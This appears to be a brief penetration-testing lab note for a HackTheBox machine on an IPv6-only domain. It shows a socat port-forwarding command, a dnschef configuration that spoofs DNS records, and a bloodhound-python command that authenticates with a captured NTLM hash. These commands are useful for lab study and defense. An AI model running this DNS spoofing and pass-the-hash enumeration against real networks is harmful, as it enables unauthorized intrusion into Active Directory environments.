SOCAT to redirect ports

In cases where a domain is available on IPv6 ports and not ipv4 bloodhound ingestors will send DNS queries for A records which only support ipv4. Use dnschef to poison the responses and setup the msds records for the domain and use A records to point dc and gc to 127.0.0.1. Use socat to forward traffic on the ports to the IPv6 address

sudo socat TCP-LISTEN:389,fork TCP:apt:389

DNSCHEF INI

[A]
apt.htb.local=127.0.0.1

[AAAA]
apt=dead:beef::b885:d62a:d679:573f
htb=dead:beef::b885:d62a:d679:573f
htb.local=dead:beef::b885:d62a:d679:573f
apt.htb.local=dead:beef::b885:d62a:d679:573f

[SRV]
*.*.htb.local=0 5 389 apt.htb.local

bloodhound-python -u 'henry.vinson' -c all -d htb.local -dc apt.htb.local -gc apt.htb.local --hashes :e53d87d42adaa3ca32bdb34a876cbffb -ns 127.0.0.1 --zip

PreviousSMTP Server Found NextSystem on DC TGT Delegation